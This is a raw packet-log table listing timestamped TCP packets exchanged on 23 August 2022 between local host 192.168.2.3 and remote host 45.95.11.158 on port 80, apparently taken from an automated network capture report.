Aug 23, 2022 03:42:47.620060921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620107889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620110989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620147943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620157003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620183945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620187044 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620209932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620232105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620255947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620255947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620300055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620304108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620349884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620352030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620382071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620393991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620424986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620424986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620471954 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620471954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620518923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620520115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620547056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620560884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620584011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620587111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620623112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620628119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620659113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620663881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620685101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620699883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620726109 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620829105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620868921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620887041 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620907068 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620909929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620940924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.620960951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.620991945 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621049881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621092081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621109962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621131897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621141911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621170998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621206999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621222019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621231079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621248960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621269941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621306896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621313095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621331930 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621349096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621392012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621515036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621556044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621581078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621596098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621601105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621639013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621645927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621678114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621678114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621716022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621722937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621754885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621762991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621779919 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.621800900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.621834040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.625972033 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626020908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626063108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626092911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626132011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626152992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626172066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626178026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626203060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626214027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626257896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626269102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626288891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626308918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626333952 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626343012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626391888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626399994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626447916 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626472950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626513958 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626522064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626558065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626573086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626611948 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626621008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626667023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626684904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626725912 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626738071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626773119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626776934 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626827955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626836061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626883030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626892090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626940012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.626948118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.626995087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627002954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627051115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627057076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627105951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627115011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627156019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627173901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627218008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627219915 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627262115 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627275944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627320051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.627325058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.627367973 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.630861998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.630911112 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.630966902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.630961895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.631011009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.631016016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.631058931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.631063938 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.631067991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.631110907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.631114960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.631143093 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.631289959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.650881052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.650930882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.650948048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.650960922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.650978088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.650995016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651011944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651022911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651040077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651082039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651151896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651175022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651192904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651204109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651221037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651223898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651238918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651254892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651259899 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651292086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651319981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651429892 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651454926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651478052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651499987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651499987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651515961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651520967 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651561975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651573896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651597977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651614904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651619911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651637077 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651638031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651664019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651681900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.651930094 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651958942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651981115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.651995897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652003050 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652021885 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652044058 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652044058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652070045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652086020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652183056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652302980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652321100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652362108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652376890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652384043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652410030 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652424097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652431011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652446032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652447939 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652472019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652482986 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652517080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652539968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652561903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652561903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652571917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652580023 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652601004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652604103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652616024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652638912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652726889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652749062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652765036 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652780056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652807951 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.652899981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.652950048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653053045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653076887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653093100 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653105974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653125048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653142929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653441906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653469086 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653490067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653506994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653511047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653534889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653542995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653882027 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653908014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653930902 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653944969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.653945923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653970957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.653995037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654073954 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654098988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654120922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654122114 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654134989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654139042 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654155970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654176950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654653072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654684067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654707909 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654722929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654728889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654747009 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654759884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654768944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654793024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654814959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654819965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654829979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.654846907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654861927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.654880047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.659883022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.659926891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.659950972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.659995079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660077095 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660123110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660209894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660237074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660259962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660275936 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660280943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660327911 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660403013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660434008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660455942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660459995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660486937 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660501957 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660563946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660586119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660609007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660609961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660624027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660633087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660650969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.660654068 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660679102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.660691977 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.661979914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662060976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.662287951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662312984 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662328005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662350893 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662364006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.662386894 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.662429094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.662475109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662498951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.662528038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.663474083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.663551092 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.663559914 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.664666891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.664736032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.664769888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.664783001 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.664814949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.664848089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.664855003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.664887905 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.664892912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.664930105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.665076017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.665091038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.665124893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.665146112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.684919119 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.684957981 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.684982061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685007095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685030937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685074091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685092926 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685090065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685141087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685172081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685199022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685214043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685224056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685247898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:47.685247898 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:47.685262918 CEST	49774	80	192.168.2.3	45.95.11.158
